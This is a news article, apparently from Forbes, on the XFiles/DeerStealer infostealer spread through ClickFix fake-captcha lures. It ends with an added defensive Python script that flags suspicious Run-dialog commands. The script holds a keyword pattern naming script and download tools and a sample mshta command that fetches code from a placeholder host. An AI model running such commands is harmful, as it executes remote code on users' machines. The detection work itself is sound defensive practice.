Your Passwords Are At Risk — New Windows XFiles Attack Confirmed


Forbes, 17-06-2025

Windows passwords come under attack from XFiles threat.
Two things that are guaranteed to strike fear into the hearts of anyone concerned about cybersecurity attacks are Windows and passwords. Combine the two, and you have the basis of what can be something of a security nightmare. With Microsoft account password spraying attacks and warnings over opening specific Outlook files in the news as Windows email, passwords and 2FA codes come under attack, this is kind of understandable. Now, with confirmation of a password-stealing threat called XFiles, is there even more cause for concern? The truth, as they say, is out there.
A group of self-proclaimed elite threat hunters and cyber analysts has issued a warning that attackers deploying a malware payload called XFiles, also known as DeerStealer, are targeting Windows users in order to compromise passwords that can then be sold on dark web criminal marketplaces.
A June 12 report published by the eSentire Threat Response Unit has revealed how, throughout May, threat actors have been using the XFiles payload in order to steal Windows passwords that can then be sold by a dark web user known only as LuciferXfiles.
The methods employed are sadly all too familiar, involving ClickFix attacks during the initial access process. These tech support scams combine seemingly genuine offers of help regarding security issues surrounding account activity with fake ID Captcha prompts that involve executing malicious commands using the Windows Run prompt.
Should the victim get to this stage, they will then download something called HijackLoader, often obfuscated using an encrypted PNG image, that downloads the real payload, the XFiles infostealer malware, to compromise passwords, browser 2FA session cookies, instant messages and more.
Read the full report for a detailed technical analysis of the entire attack chain. When it comes to mitigation, however, the eSentire TRU advice is clear:
I would have to add to this that opening the Windows Run prompt and pasting the clipboard's content, which is how ClickFix attacks work, is hardly conducive to good security practice or, frankly, common sense. I mean, how many Captcha or I Am Not A Robot tests have ever asked you to do that? The answer is zero. Protect your passwords by not being tricked into doing something that is so obviously out of the ordinary.
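The Run-prompt step leaves a trace a defender can check: Explorer records commands entered in the Run dialog under the current user's RunMRU registry key. The Python below is an added example, not code from the article or the eSentire report; it parses those values and flags entries that look like pasted ClickFix commands. The heuristics, function names and sample values are assumptions constructed for illustration.

```python
import re
import sys

RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics are assumptions chosen for this example, not indicators from the report.
HEURISTICS = {
    "script-host": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|curl|msiexec|wscript|cscript|rundll32|regsvr32)\b", re.I),
    "remote-url": re.compile(r"https?://", re.I),
    "lure-text": re.compile(r"captcha|not a robot|verif", re.I),
}

# Constructed sample of RunMRU values: one letter-named value per command,
# each ending in "\1", plus MRUList giving most-recent-first order.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "notepad C:\\Users\\alice\\notes.txt\\1",
    "c": "mshta https://example.invalid/verify # CAPTCHA verification ID 4821\\1",
}

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, from a dict of RunMRU values."""
    cmds = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if isinstance(data, str):
            # Strip the trailing "\1" marker Explorer appends to each entry.
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def score(cmd):
    """Return the names of the heuristics that match one command string."""
    return [name for name, rx in HEURISTICS.items() if rx.search(cmd)]

def triage(values):
    """Return (command, reasons) for entries matching two or more heuristics."""
    scored = [(cmd, score(cmd)) for cmd in parse_runmru(values)]
    return [(cmd, reasons) for cmd, reasons in scored if len(reasons) >= 2]

def read_runmru():
    """Read the current user's RunMRU values from the registry (Windows only)."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = data
    return values

if __name__ == "__main__":
    values = read_runmru() if sys.platform == "win32" else SAMPLE_RUNMRU
    for cmd, reasons in triage(values):
        print(f"[!] {cmd}  <- {', '.join(reasons)}")
```

A bare `cmd` typed into the Run dialog matches only one heuristic and is not flagged, which keeps routine use of the prompt out of the results.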
